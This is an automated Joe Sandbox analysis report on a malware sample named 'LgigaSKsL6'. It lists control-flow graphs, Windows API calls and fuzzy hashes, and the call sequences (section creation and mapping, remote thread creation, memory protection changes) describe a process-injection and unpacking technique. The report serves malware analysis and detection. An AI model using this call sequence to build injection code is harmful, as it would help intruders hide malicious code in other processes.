                                                                  • LCMapStringA.KERNEL32(00000000,00000000,004183C0,00000000,?,00000000), ref: 00415DEB
                                                                  • PulseEvent.KERNEL32(00000000), ref: 00415DFB
                                                                  • SetCommState.KERNELBASE(00000000,00000000), ref: 00415E24
                                                                  • GetConsoleAliasesLengthA.KERNEL32(00000000), ref: 00415E55
                                                                  • GetStringTypeExW.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 00415E66
                                                                  • BuildCommDCBA.KERNEL32(00000000,00000000), ref: 00415E6E
                                                                  • GetTimeFormatW.KERNEL32(00000000,00000000,?,004183EC,?,00000000), ref: 00415EAE
                                                                  • GetFileAttributesA.KERNEL32(00000000), ref: 00415EB5
                                                                  • GetConsoleAliasExesLengthA.KERNEL32 ref: 00415EBB
                                                                  • GetBinaryType.KERNEL32(0041842C,?), ref: 00415ECD
                                                                  • LoadLibraryA.KERNELBASE(00418438), ref: 00415F52
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1815075152.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_40b000_LgigaSKsL6.jbxd
                                                                  Similarity
                                                                  • API ID: Console$CommFile$LengthReadStringType$AliasAliasesAtomAttributesBinaryBuildCompareConfigDefaultDisconnectEventExchangeExesFindFormatInterlockedLibraryLoadModeModuleMoveNameNamedOutputPathPipePulseSearchStateTimeVersion
                                                                  • String ID: k`$}$
                                                                  • API String ID: 2545807588-956986773
                                                                  • Opcode ID: 87a73dc456498ccd6cf10fd0e6ff5224145c6502590b1386d6c04f00a117fefb
                                                                  • Instruction ID: 9088986ea41186524788a2102304772e7f24ba617efa9d05027aa238ecf44273
                                                                  • Opcode Fuzzy Hash: 87a73dc456498ccd6cf10fd0e6ff5224145c6502590b1386d6c04f00a117fefb
                                                                  • Instruction Fuzzy Hash: 6BA1E371845A24EBC720DB65EC44ADF7BB8EF89751F40406AF50AA7190DB381A81CFED

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 146 401514-401533 148 401524-40152f 146->148 149 401536-40156e call 401193 146->149 148->149 158 401570 149->158 159 401573-401578 149->159 158->159 161 401898-4018a0 159->161 162 40157e-40158f 159->162 161->159 165 4018a5-4018b7 161->165 166 401595-4015be 162->166 167 401896 162->167 172 4018c5 165->172 173 4018bc-4018e3 call 401193 165->173 166->167 176 4015c4-4015db NtDuplicateObject 166->176 167->165 172->173 176->167 178 4015e1-401605 NtCreateSection 176->178 180 401661-401687 NtCreateSection 178->180 181 401607-401628 NtMapViewOfSection 178->181 180->167 182 40168d-401691 180->182 181->180 184 40162a-401646 NtMapViewOfSection 181->184 182->167 185 401697-4016b8 NtMapViewOfSection 182->185 184->180 187 401648-40165e 184->187 185->167 188 4016be-4016da NtMapViewOfSection 185->188 187->180 188->167 191 4016e0 call 4016e5 188->191
                                                                  APIs
                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1815050395.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_LgigaSKsL6.jbxd
                                                                  Similarity
                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                  • String ID:
                                                                  • API String ID: 1546783058-0
                                                                  • Opcode ID: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                                                  • Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
                                                                  • Opcode Fuzzy Hash: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                                                  • Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 193 4014fe-401503 194 401531-40156e call 401193 193->194 195 401506-401511 193->195 205 401570 194->205 206 401573-401578 194->206 205->206 208 401898-4018a0 206->208 209 40157e-40158f 206->209 208->206 212 4018a5-4018b7 208->212 213 401595-4015be 209->213 214 401896 209->214 219 4018c5 212->219 220 4018bc-4018e3 call 401193 212->220 213->214 223 4015c4-4015db NtDuplicateObject 213->223 214->212 219->220 223->214 225 4015e1-401605 NtCreateSection 223->225 227 401661-401687 NtCreateSection 225->227 228 401607-401628 NtMapViewOfSection 225->228 227->214 229 40168d-401691 227->229 228->227 231 40162a-401646 NtMapViewOfSection 228->231 229->214 232 401697-4016b8 NtMapViewOfSection 229->232 231->227 234 401648-40165e 231->234 232->214 235 4016be-4016da NtMapViewOfSection 232->235 234->227 235->214 238 4016e0 call 4016e5 235->238
                                                                  APIs
                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1815050395.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_LgigaSKsL6.jbxd
                                                                  Similarity
                                                                  • API ID: Section$CreateDuplicateObjectView
                                                                  • String ID:
                                                                  • API String ID: 1652636561-0
                                                                  • Opcode ID: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                                                  • Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
                                                                  • Opcode Fuzzy Hash: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                                                  • Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 240 401542-40156e call 401193 249 401570 240->249 250 401573-401578 240->250 249->250 252 401898-4018a0 250->252 253 40157e-40158f 250->253 252->250 256 4018a5-4018b7 252->256 257 401595-4015be 253->257 258 401896 253->258 263 4018c5 256->263 264 4018bc-4018e3 call 401193 256->264 257->258 267 4015c4-4015db NtDuplicateObject 257->267 258->256 263->264 267->258 269 4015e1-401605 NtCreateSection 267->269 271 401661-401687 NtCreateSection 269->271 272 401607-401628 NtMapViewOfSection 269->272 271->258 273 40168d-401691 271->273 272->271 275 40162a-401646 NtMapViewOfSection 272->275 273->258 276 401697-4016b8 NtMapViewOfSection 273->276 275->271 278 401648-40165e 275->278 276->258 279 4016be-4016da NtMapViewOfSection 276->279 278->271 279->258 282 4016e0 call 4016e5 279->282
                                                                  APIs
                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1815050395.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_LgigaSKsL6.jbxd
                                                                  Similarity
                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                  • String ID:
                                                                  • API String ID: 1546783058-0
                                                                  • Opcode ID: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                                                  • Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
                                                                  • Opcode Fuzzy Hash: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                                                  • Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 284 401549-40156e call 401193 288 401570 284->288 289 401573-401578 284->289 288->289 291 401898-4018a0 289->291 292 40157e-40158f 289->292 291->289 295 4018a5-4018b7 291->295 296 401595-4015be 292->296 297 401896 292->297 302 4018c5 295->302 303 4018bc-4018e3 call 401193 295->303 296->297 306 4015c4-4015db NtDuplicateObject 296->306 297->295 302->303 306->297 308 4015e1-401605 NtCreateSection 306->308 310 401661-401687 NtCreateSection 308->310 311 401607-401628 NtMapViewOfSection 308->311 310->297 312 40168d-401691 310->312 311->310 314 40162a-401646 NtMapViewOfSection 311->314 312->297 315 401697-4016b8 NtMapViewOfSection 312->315 314->310 317 401648-40165e 314->317 315->297 318 4016be-4016da NtMapViewOfSection 315->318 317->310 318->297 321 4016e0 call 4016e5 318->321
                                                                  APIs
                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1815050395.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_LgigaSKsL6.jbxd
                                                                  Similarity
                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                  • String ID:
                                                                  • API String ID: 1546783058-0
                                                                  • Opcode ID: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                                                  • Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
                                                                  • Opcode Fuzzy Hash: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                                                  • Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 323 401557 324 40155b-40156e call 401193 323->324 325 40154f-401554 323->325 328 401570 324->328 329 401573-401578 324->329 325->324 328->329 331 401898-4018a0 329->331 332 40157e-40158f 329->332 331->329 335 4018a5-4018b7 331->335 336 401595-4015be 332->336 337 401896 332->337 342 4018c5 335->342 343 4018bc-4018e3 call 401193 335->343 336->337 346 4015c4-4015db NtDuplicateObject 336->346 337->335 342->343 346->337 348 4015e1-401605 NtCreateSection 346->348 350 401661-401687 NtCreateSection 348->350 351 401607-401628 NtMapViewOfSection 348->351 350->337 352 40168d-401691 350->352 351->350 354 40162a-401646 NtMapViewOfSection 351->354 352->337 355 401697-4016b8 NtMapViewOfSection 352->355 354->350 357 401648-40165e 354->357 355->337 358 4016be-4016da NtMapViewOfSection 355->358 357->350 358->337 361 4016e0 call 4016e5 358->361
                                                                  APIs
                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1815050395.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_LgigaSKsL6.jbxd
                                                                  Similarity
                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                  • String ID:
                                                                  • API String ID: 1546783058-0
                                                                  • Opcode ID: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                                                  • Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
                                                                  • Opcode Fuzzy Hash: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                                                  • Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 364 402f97-402fbb 365 402fc1-402fd9 364->365 366 4030ee-4030f3 364->366 365->366 367 402fdf-402ff0 365->367 368 402ff2-402ffb 367->368 369 403000-40300e 368->369 369->369 370 403010-403017 369->370 371 403039-403040 370->371 372 403019-403038 370->372 373 403062-403065 371->373 374 403042-403061 371->374 372->371 375 403067-40306a 373->375 376 40306e 373->376 374->373 375->376 377 40306c 375->377 376->368 378 403070-403075 376->378 377->378 378->366 379 403077-40307a 378->379 379->366 380 40307c-4030eb RtlCreateUserThread NtTerminateProcess 379->380 380->366
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1815050395.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_LgigaSKsL6.jbxd
                                                                  Similarity
                                                                  • API ID: CreateProcessTerminateThreadUser
                                                                  • String ID:
                                                                  • API String ID: 1921587553-0
                                                                  • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                  • Instruction ID: 1591ba869369ea84e79847af2efd18b9bf5795e6c00b1d775a4c0b4e714efbc4
                                                                  • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                  • Instruction Fuzzy Hash: FD414531218E0C4FD7A8EF6CA88576277D5F798311F6643AAE809D3389EA74DC1183C5

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 381 2c4a856-2c4a86f 382 2c4a871-2c4a873 381->382 383 2c4a875 382->383 384 2c4a87a-2c4a886 CreateToolhelp32Snapshot 382->384 383->384 385 2c4a896-2c4a8a3 Module32First 384->385 386 2c4a888-2c4a88e 384->386 387 2c4a8a5-2c4a8a6 call 2c4a515 385->387 388 2c4a8ac-2c4a8b4 385->388 386->385 393 2c4a890-2c4a894 386->393 391 2c4a8ab 387->391 391->388 393->382 393->385
                                                                  APIs
                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02C4A87E
                                                                  • Module32First.KERNEL32(00000000,00000224), ref: 02C4A89E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816255737.0000000002C47000.00000040.00000020.00020000.00000000.sdmp, Offset: 02C47000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2c47000_LgigaSKsL6.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                  • String ID:
                                                                  • API String ID: 3833638111-0
                                                                  • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                  • Instruction ID: 10fda4b4523c4c0813588109c1328d08f4cbedc4d5c225a286f1efb4a8f05c34
                                                                  • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                  • Instruction Fuzzy Hash: E7F096355407106FD7203BF5AC9DB6F76ECFF89625F100538E642914C0DF70E9468AA1

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 61 2fc003c-2fc0047 62 2fc004c-2fc0263 call 2fc0a3f call 2fc0e0f call 2fc0d90 VirtualAlloc 61->62 63 2fc0049 61->63 78 2fc028b-2fc0292 62->78 79 2fc0265-2fc0289 call 2fc0a69 62->79 63->62 81 2fc02a1-2fc02b0 78->81 83 2fc02ce-2fc03c2 VirtualProtect call 2fc0cce call 2fc0ce7 79->83 81->83 84 2fc02b2-2fc02cc 81->84 90 2fc03d1-2fc03e0 83->90 84->81 91 2fc0439-2fc04b8 VirtualFree 90->91 92 2fc03e2-2fc0437 call 2fc0ce7 90->92 94 2fc04be-2fc04cd 91->94 95 2fc05f4-2fc05fe 91->95 92->90 97 2fc04d3-2fc04dd 94->97 98 2fc077f-2fc0789 95->98 99 2fc0604-2fc060d 95->99 97->95 101 2fc04e3-2fc0505 97->101 102 2fc078b-2fc07a3 98->102 103 2fc07a6-2fc07b0 98->103 99->98 104 2fc0613-2fc0637 99->104 112 2fc0517-2fc0520 101->112 113 2fc0507-2fc0515 101->113 102->103 105 2fc086e-2fc08be LoadLibraryA 103->105 106 2fc07b6-2fc07cb 103->106 107 2fc063e-2fc0648 104->107 111 2fc08c7-2fc08f9 105->111 109 2fc07d2-2fc07d5 106->109 107->98 110 2fc064e-2fc065a 107->110 114 2fc0824-2fc0833 109->114 115 2fc07d7-2fc07e0 109->115 110->98 116 2fc0660-2fc066a 110->116 118 2fc08fb-2fc0901 111->118 119 2fc0902-2fc091d 111->119 120 2fc0526-2fc0547 112->120 113->120 117 2fc0839-2fc083c 114->117 121 2fc07e4-2fc0822 115->121 122 2fc07e2 115->122 123 2fc067a-2fc0689 116->123 117->105 124 2fc083e-2fc0847 117->124 118->119 127 2fc054d-2fc0550 120->127 121->109 122->114 125 2fc068f-2fc06b2 123->125 126 2fc0750-2fc077a 123->126 128 2fc0849 124->128 129 2fc084b-2fc086c 124->129 130 2fc06ef-2fc06fc 125->130 131 2fc06b4-2fc06ed 125->131 126->107 133 2fc0556-2fc056b 127->133 134 2fc05e0-2fc05ef 127->134 128->105 129->117 135 2fc06fe-2fc0748 130->135 136 2fc074b 130->136 131->130 137 2fc056d 133->137 138 2fc056f-2fc057a 133->138 134->97 135->136 136->123 137->134 139 2fc057c-2fc0599 138->139 140 2fc059b-2fc05bb 138->140 145 2fc05bd-2fc05db 139->145 140->145 145->127
                                                                  APIs
                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02FC024D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816464417.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2fc0000_LgigaSKsL6.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID: cess$kernel32.dll
                                                                  • API String ID: 4275171209-1230238691
                                                                  • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                  • Instruction ID: 610401f59bd3e033c332991e216635eec9ee6a516276f39422bb654a80fc4d1b
                                                                  • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                  • Instruction Fuzzy Hash: 97525975A01229DFDB64CF58C984BACBBB1BF09304F1480E9E94DAB351DB30AA95DF14

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 363 4158a0-4159e0 GetModuleHandleW GetProcAddress VirtualProtect
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(02B19CE8), ref: 0041597F
                                                                  • GetProcAddress.KERNEL32(00000000,0041BCD0), ref: 004159BC
                                                                  • VirtualProtect.KERNELBASE(02B19B2C,02B19CE4,00000040,?), ref: 004159DB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1815075152.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_40b000_LgigaSKsL6.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProcProtectVirtual
                                                                  • String ID:
                                                                  • API String ID: 2099061454-3916222277
                                                                  • Opcode ID: c9706728d37e00871e7f67ced595d0c79eb19ddcf454875c36666ff37d1ec3ad
                                                                  • Instruction ID: 9f4e34dfc4b6fe9394a1db25d0a6d7b53828682d58b9ddec5cea0b2bad73ce3c
                                                                  • Opcode Fuzzy Hash: c9706728d37e00871e7f67ced595d0c79eb19ddcf454875c36666ff37d1ec3ad
                                                                  • Instruction Fuzzy Hash: 3D3167149487C0CAE301CB78F8547823FA2EB25744F44847CD189873A5EFBA1524D7EE

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 394 2fc0e0f-2fc0e24 SetErrorMode * 2 395 2fc0e2b-2fc0e2c 394->395 396 2fc0e26 394->396 396->395
                                                                  APIs
                                                                  • SetErrorMode.KERNELBASE(00000400,?,?,02FC0223,?,?), ref: 02FC0E19
                                                                  • SetErrorMode.KERNELBASE(00000000,?,?,02FC0223,?,?), ref: 02FC0E1E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816464417.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2fc0000_LgigaSKsL6.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ErrorMode
                                                                  • String ID:
                                                                  • API String ID: 2340568224-0
                                                                  • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                  • Instruction ID: ecccb221eca8afc39b238fc6a573dbfafbac2534b4061c7d54fb180911970f8b
                                                                  • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                  • Instruction Fuzzy Hash: 4AD01231545129B7D7003A94DC09BCD7B1CDF05BA6F108011FB0DD9080CB70954146E5

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 397 4018e6-40194b call 401193 Sleep call 40141f 411 40195a-4019a5 call 401193 397->411 412 40194d-401955 call 401514 397->412 412->411
                                                                  APIs
                                                                  • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                    • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                    • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                    • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1815050395.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_LgigaSKsL6.jbxd
                                                                  Similarity
                                                                  • API ID: Section$CreateDuplicateObjectSleepView
                                                                  • String ID:
                                                                  • API String ID: 1885482327-0
                                                                  • Opcode ID: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                                                  • Instruction ID: 08a90aa29aaa59261053d8f0d19a3ecdc4dd21bf61fce8c4d66a51d0c793aa75
                                                                  • Opcode Fuzzy Hash: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                                                  • Instruction Fuzzy Hash: EB11A1F660C204FAEB106AA49C61E7A3318AB40754F304137F613790F5957D9A13F66F

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 426 401915-401918 427 4018c6-4018c7 426->427 428 40191a-40194b call 401193 Sleep call 40141f 426->428 429 4018d7 427->429 430 4018ce-4018e3 call 401193 427->430 440 40195a-4019a5 call 401193 428->440 441 40194d-401955 call 401514 428->441 429->430 441->440
                                                                  APIs
                                                                  • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                    • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                    • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                    • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1815050395.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_LgigaSKsL6.jbxd
                                                                  Similarity
                                                                  • API ID: Section$CreateDuplicateObjectSleepView
                                                                  • String ID:
                                                                  • API String ID: 1885482327-0
                                                                  • Opcode ID: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                                                  • Instruction ID: d2c64d108ecd7190b789ce3c9d4f03e3911909dfd4099b6475a4add21270c3a3
                                                                  • Opcode Fuzzy Hash: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                                                  • Instruction Fuzzy Hash: 6D019EB7208208E6DB006AA5AC51ABA33189B44359F304537F723790F6D57D8612E72F

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 455 4018f1-40194b call 401193 Sleep call 40141f 465 40195a-4019a5 call 401193 455->465 466 40194d-401955 call 401514 455->466 466->465
                                                                  APIs
                                                                  • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                    • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                    • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                    • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1815050395.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_LgigaSKsL6.jbxd
                                                                  Similarity
                                                                  • API ID: Section$CreateDuplicateObjectSleepView
                                                                  • String ID:
                                                                  • API String ID: 1885482327-0
                                                                  • Opcode ID: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                                                  • Instruction ID: b5ca90d31d4069b8fd1e735589466699ca1bb5e14181e618ca72d4e2f39bbf06
                                                                  • Opcode Fuzzy Hash: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                                                  • Instruction Fuzzy Hash: D101D2B6608204EBDB019AF49C62A7A37549F44315F200137FA53790F1D67D8643E72F

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 480 401912-40194b call 401193 Sleep call 40141f 491 40195a-4019a5 call 401193 480->491 492 40194d-401955 call 401514 480->492 492->491
